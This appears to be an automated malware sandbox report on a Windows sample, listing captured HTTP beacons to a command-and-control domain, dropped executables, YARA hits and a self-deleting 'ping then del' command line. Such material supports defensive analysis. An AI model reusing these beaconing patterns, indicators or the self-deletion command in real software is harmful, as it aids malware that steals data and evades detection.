0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49726	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:14.412805080 CET	161	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 93 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 54 36 36 7a 75 49 6b 46 78 34 51 48 5a 5a 51 78 39 65 4e 79 4f 75 39 63 6f 44 2d 69 4f 65 62 36 51 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFT66zuIkFx4QHZZQx9eNyOu9coD-iOeb6Q~~
Jan 30, 2021 18:07:14.619900942 CET	162	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49727	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:14.949810982 CET	163	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 81 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 55 73 43 66 62 73 30 45 71 51 42 56 37 32 4b 6f 78 6d 45 42 71 55 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFUsCfbs0EqQBV72KoxmEBqU~
Jan 30, 2021 18:07:15.144808054 CET	164	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49728	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:21.187683105 CET	165	OUT	GET /info/dd HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Jan 30, 2021 18:07:21.382164001 CET	166	IN	HTTP/1.1 200 OK Date: Sat, 30 Jan 2021 17:07:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Set-Cookie: SessionId=6ec67585f91d477dbcf57a8802bef742; domain=.www.namecheap.com; path=/; httponly Set-Cookie: x-ncpl-csrf=925a5aa42aa64fbab886dac2e496e6ce; domain=.www.namecheap.com; path=/; secure; samesite=none X-Proxy-Cache: HIT Server: namecheap-nginx Data Raw: 65 38 39 0d 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 65 67 69 73 74 72 61 6e 74 20 57 48 4f 49 53 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 7c 20 4e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6e 63 2d 69 63 6f 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6e 63 5f 6d 61 69 6e 4c 65 67 61 63 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 72 65 74 75 72 6e 20 6e 2e 64 28 65 2c 22 61 22 2c 65 29 2c 65 7d 2c 6e 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 6e 29 7d 2c 6e 2e 70 3d 22 22 2c 6e 28 6e 2e 73 3d 32 37 33 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 33 29 2c 69 3d 65 28 31 35 29 2c 6f 3d 65 28 31 30 29 2c 61 3d 65 28 31 31 29 2c 75 3d 65 28 31 36 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 Data Ascii: e89<html><head lang="en"><meta charset="UTF-8"/><title>Registrant WHOIS contact information verification \| Namecheap.com</title><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="shortcut icon" href="https://www.namecheap.com/assets/img/nc-icon/favicon.ico"/><script type="text/javascript">var nc_mainLegacy=function(t){function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}var e={};return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)\|\|Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},n.p="",n(n.s=273)}([function(t,n,e){var r=e(3),i=e(15),o=e(10),a=e(11),u=e(16),s=function(t,n,e){var
Jan 30, 2021 18:07:21.382209063 CET	167	IN	Data Raw: 20 63 2c 66 2c 6c 2c 68 2c 70 3d 74 26 73 2e 46 2c 64 3d 74 26 73 2e 47 2c 79 3d 74 26 73 2e 53 2c 76 3d 74 26 73 2e 50 2c 67 3d 74 26 73 2e 42 2c 6d 3d 64 3f 72 3a 79 3f 72 5b 6e 5d 7c 7c 28 72 5b 6e 5d 3d 7b 7d 29 3a 28 72 5b 6e 5d 7c 7c 7b 7d Data Ascii: c,f,l,h,p=t&s.F,d=t&s.G,y=t&s.S,v=t&s.P,g=t&s.B,m=d?r:y?r[n]\|\|(r[n]={}):(r[n]\|\|{}).prototype,b=d?i:i[n]\|\|(i[n]={}),w=b.prototype\|\|(b.prototype={});d&&(e=n);for(c in e)f=!p&&m&&void 0!==m[c],l=(f?m:e)[c],h=g&&f?u(l,r):v&&"function"==typeof l?u
Jan 30, 2021 18:07:21.382245064 CET	169	IN	Data Raw: 73 6f 72 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 21 22 29 3b 72 65 74 75 72 6e 22 76 61 6c 75 65 22 69 6e 20 65 26 26 28 74 5b 6e 5d 3d 65 2e 76 61 6c 75 65 29 2c 74 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 74 2e 65 78 70 6f Data Ascii: sors not supported!");return"value"in e&&(t[n]=e.value),t}},function(t,n,e){t.exports=!e(2)(function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})},function(t,n,e){var r=e(21);t.exports=function(t){return Object(r(t)
Jan 30, 2021 18:07:21.382270098 CET	169	IN	Data Raw: 72 3a 65 29 28 74 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 65 3d 74 2e 65 78 70 6f 72 74 73 3d 7b 76 65 72 73 69 6f 6e 3a 22 32 2e 35 2e 37 22 7d 3b 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 65 26 26 28 5f Data Ascii: r:e)(t)}},function(t,n){var e=t.exports={version:"2.5.7"};"number"==typeof __e&&(__e=e)},function(t,n,e){var r=e(17);t.exports=function(t,n,e){if
Jan 30, 2021 18:07:21.382303953 CET	170	IN	Data Raw: 31 30 30 30 0d 0a 28 72 28 74 29 2c 76 6f 69 64 20 30 3d 3d 3d 6e 29 72 65 74 75 72 6e 20 74 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 Data Ascii: 1000(r(t),void 0===n)return t;switch(e){case 1:return function(e){return t.call(n,e)};case 2:return function(e,r){return t.call(n,e,r)};case 3:return function(e,r,i){return t.call(n,e,r,i)}}return function(){return t.apply(n,arguments)}}},fu
Jan 30, 2021 18:07:21.382338047 CET	172	IN	Data Raw: 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 35 29 28 22 75 6e 73 63 6f 70 61 62 6c 65 73 22 29 2c 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 3b 76 6f 69 64 20 30 3d 3d 69 5b 72 5d 26 26 65 28 31 30 29 Data Ascii: }},function(t,n,e){var r=e(5)("unscopables"),i=Array.prototype;void 0==i[r]&&e(10)(i,r,{}),t.exports=function(t){i[r][t]=!0}},function(t,n,e){var r=e(1);t.exports=function(t,n){if(!r(t))return t;var e,i;if(n&&"function"==typeof(e=t.toString)&&
Jan 30, 2021 18:07:21.382447958 CET	173	IN	Data Raw: 72 69 65 73 2c 61 74 3d 48 2e 6c 61 73 74 49 6e 64 65 78 4f 66 2c 75 74 3d 48 2e 72 65 64 75 63 65 2c 73 74 3d 48 2e 72 65 64 75 63 65 52 69 67 68 74 2c 63 74 3d 48 2e 6a 6f 69 6e 2c 66 74 3d 48 2e 73 6f 72 74 2c 6c 74 3d 48 2e 73 6c 69 63 65 2c Data Ascii: ries,at=H.lastIndexOf,ut=H.reduce,st=H.reduceRight,ct=H.join,ft=H.sort,lt=H.slice,ht=H.toString,pt=H.toLocaleString,dt=A("iterator"),yt=A("toStringTag"),vt=j("typed_constructor"),gt=j("def_constructor"),mt=u.CONSTR,bt=u.TYPED,wt=u.VIEW,St=O(1,
Jan 30, 2021 18:07:21.382677078 CET	175	IN	Data Raw: 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 44 74 3d 7b 63 6f 70 79 57 69 74 68 69 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 42 2e 63 61 6c 6c 28 45 74 28 74 68 69 73 29 2c 74 2c 6e 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e Data Ascii: ,arguments)},Dt={copyWithin:function(t,n){return B.call(Et(this),t,n,arguments.length>2?2000arguments[2]:void 0)},every:function(t){return X(Et(this),t,arguments.length>1?arguments[1]:void 0)},fill:function(t){return I.apply(Et(this),argum
Jan 30, 2021 18:07:21.382715940 CET	176	IN	Data Raw: 69 3d 67 28 74 2c 72 29 3b 72 65 74 75 72 6e 20 6e 65 77 28 50 28 65 2c 65 5b 67 74 5d 29 29 28 65 2e 62 75 66 66 65 72 2c 65 2e 62 79 74 65 4f 66 66 73 65 74 2b 69 2a 65 2e 42 59 54 45 53 5f 50 45 52 5f 45 4c 45 4d 45 4e 54 2c 79 28 28 76 6f 69 Data Ascii: i=g(t,r);return new(P(e,e[gt]))(e.buffer,e.byteOffset+i*e.BYTES_PER_ELEMENT,y((void 0===n?r:g(n,r))-i))}},Kt=function(t,n){return _t(this,lt.call(Et(this),t,n))},Rt=function(t){Et(this);var n=xt(arguments[1],1),e=this.length,r=M(t),i=y(r.lengt
Jan 30, 2021 18:07:21.382752895 CET	177	IN	Data Raw: 26 64 2e 70 72 6f 74 6f 74 79 70 65 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 2e 5f 64 3b 72 65 74 75 72 6e 20 72 2e 76 5b 6c 5d 28 65 2a 6e 2b 72 2e 6f 2c 4d 74 29 7d 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c Data Ascii: &d.prototype,_=function(t,e){var r=t._d;return r.v[l](en+r.o,Mt)},j=function(t,e,r){var i=t._d;s&&(r=(r=Math.round(r))<0?0:r>255?255:255&r),i.v[p](en+i.o,r,Mt)},A=function(t,n){L(t,n,{get:function(){return _(this,n)},set:function(t){return j
Jan 30, 2021 18:07:21.575056076 CET	179	IN	Data Raw: 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 2c 4d 5b 63 5d 3d 64 2c 61 28 61 2e 47 2b 61 2e 57 2b 61 2e 46 2a 28 64 21 3d 67 29 2c 4d 29 2c 61 28 61 2e 53 2c 63 2c 7b 42 59 54 45 53 5f 50 45 52 5f 45 4c 45 Data Ascii: ,{get:function(){return c}}),M[c]=d,a(a.G+a.W+a.F(d!=g),M),a(a.S,c,{BYTES_PER_ELEMENT:n}),a(a.S+a.Fo(function(){g.of.call(d,1)}),c,{from:Ot,of:Ft}),"BYTES_PER_ELEMENT"in k\|\|h(k,"BYTES_PER_ELEMENT",n),a(a.P,c,Dt),R(c),a(a.P+a.F*kt,c,{set:Rt})

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: aOn5CfTiwS.exe PID: 4088 Parent PID: 5660

General

Start time:	18:07:03
Start date:	30/01/2021
Path:	C:\Users\user\Desktop\aOn5CfTiwS.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Imagebase:	0x400000
File size:	5007872 bytes
MD5 hash:	013EBA0050EBE18E39978E89A56C0FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: 1612058829275.exe PID: 5644 Parent PID: 4088

General

Start time:	18:07:09
Start date:	30/01/2021
Path:	C:\Users\user\AppData\Roaming\1612058829275.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 14%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: ThunderFW.exe PID: 5436 Parent PID: 4088

General

Start time:	18:07:15
Start date:	30/01/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0x950000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 2%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 460 Parent PID: 4088

General

Start time:	18:07:29
Start date:	30/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Imagebase:	0x1120000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5288 Parent PID: 460

General

Start time:	18:07:29
Start date:	30/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 5352 Parent PID: 460

General

Start time:	18:07:29
Start date:	30/01/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xfa0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: aOn5CfTiwS.exe PID: 4088 Parent PID: 5660 aOn5CfTiwS.exeCOMMON

Executed Functions

Function 00402FA6, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000000,?,?), ref: 00403105

Strings

@, xrefs: 00402FDD
, xrefs: 00402FD6

Memory Dump Source

Source File: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: $@
API String ID: 544645111-1077428164
Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
Instruction ID: 39bf8922a6568a6c11ef7f4565982101793c20588a40b03e1cf229779ff2a52b
Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
Instruction Fuzzy Hash: DD5106B4A01219DFDB08CF88D590BADBBF5FB8C314F148259E405AB394D735AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00402AB6, Relevance: 3.9, APIs: 3, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
